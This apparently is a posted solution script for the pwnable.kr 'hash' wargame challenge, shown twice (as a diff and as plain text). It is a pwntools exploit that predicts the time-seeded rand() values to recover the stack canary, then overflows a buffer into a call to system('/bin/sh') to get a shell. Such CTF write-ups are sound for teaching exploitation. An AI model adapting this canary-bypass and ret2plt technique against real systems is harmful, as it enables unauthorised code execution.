RickGray · March 16, 2017 20:57
diff --git a/hash_exp.py b/hash_exp.py
 #!/usr/bin/env python
 # coding: utf-8

 import os
 import re
 import time
 import random
 import urllib2

 from pwn import *

 elf = ELF('./hash')

 plt_system = elf.plt['system']

 # Local EXP
 t = int(time.time())
 p = process('./hash')

 # Remote EXP
 # date = urllib2.urlopen('http://pwnable.kr').headers['Date']
 # t = int(time.mktime(time.strptime(date, '%a, %d %b %Y  %H:%M:%S %Z')))
 # t += random.randint(0, 3)
 # p = remote('127.0.0.1', 9002)

 # Get capcha value with regex
 capcha = re.search(r'(-?[\d]+)', p.recvline_regex(r'(-?[\d]{5,})')).group(0)
 p.sendline(capcha)

 # Use hashc to calc canary value
 # canary value equal to [canary = c - nums[1] - nums[5] - nums[2] + nums[3] - nums[7] - nums[4] + nums[6];]
 # hashc.c
 ##include <stdio.h>
 ##include <stdlib.h>
 #
 #int main(int argc, char* argv[]) {
 #    int t = atoi(argv[1]);
 #    int c = atoi(argv[2]);
 #    int canary = 0;
 #    int nums[8];
 #
 #    srand(t);
 #    int i = 0;
 #    for(;i <= 7; i++) {
 #        nums[i] = rand();
 #    }
 #    // c = nums[1] + nums[5] + nums[2] - nums[3] + nums[7] + canary + nums[4] - nums[6]
 #    canary = c - nums[1] - nums[5] - nums[2] + nums[3] - nums[7] - nums[4] + nums[6];
 #    printf("%x\n", canary);
 #
 #    return 0;
 #}
 canary = '0x' + os.popen('./hashc {} {}'.format(str(t), capcha)).read()
 canary = int(canary, 16)

 # Input string is in .bss [0x0804B0E0], write "/bin/sh" padding to the input buffer string
 payload = 'A' * 512 + p32(canary) + 'A' * 12 + p32(plt_system) + p32(0x8048a00) + p32(0x0804B0E0 + 540*4/3)

 p.sendline(b64e(payload) + '/bin/sh\0')
 p.interactive()
	#!/usr/bin/env python
	# coding: utf-8

	import os
	import re
	import time
	import random
	import urllib2

	from pwn import *

	elf = ELF('./hash')

	plt_system = elf.plt['system']

	# Local EXP
	t = int(time.time())
	p = process('./hash')

	# Remote EXP
	# date = urllib2.urlopen('http://pwnable.kr').headers['Date']
	# t = int(time.mktime(time.strptime(date, '%a, %d %b %Y %H:%M:%S %Z')))
	# t += random.randint(0, 3)
	# p = remote('127.0.0.1', 9002)

	# Get capcha value with regex
	capcha = re.search(r'(-?[\d]+)', p.recvline_regex(r'(-?[\d]{5,})')).group(0)
	p.sendline(capcha)

	# Use hashc to calc canary value
	# canary value equal to [canary = c - nums[1] - nums[5] - nums[2] + nums[3] - nums[7] - nums[4] + nums[6];]
	# hashc.c
	##include <stdio.h>
	##include <stdlib.h>
	#
	#int main(int argc, char* argv[]) {
	# int t = atoi(argv[1]);
	# int c = atoi(argv[2]);
	# int canary = 0;
	# int nums[8];
	#
	# srand(t);
	# int i = 0;
	# for(;i <= 7; i++) {
	# nums[i] = rand();
	# }
	# // c = nums[1] + nums[5] + nums[2] - nums[3] + nums[7] + canary + nums[4] - nums[6]
	# canary = c - nums[1] - nums[5] - nums[2] + nums[3] - nums[7] - nums[4] + nums[6];
	# printf("%x\n", canary);
	#
	# return 0;
	#}
	canary = '0x' + os.popen('./hashc {} {}'.format(str(t), capcha)).read()
	canary = int(canary, 16)

	# Input string is in .bss [0x0804B0E0], write "/bin/sh" padding to the input buffer string
	payload = 'A' * 512 + p32(canary) + 'A' * 12 + p32(plt_system) + p32(0x8048a00) + p32(0x0804B0E0 + 540*4/3)

	p.sendline(b64e(payload) + '/bin/sh\0')
	p.interactive()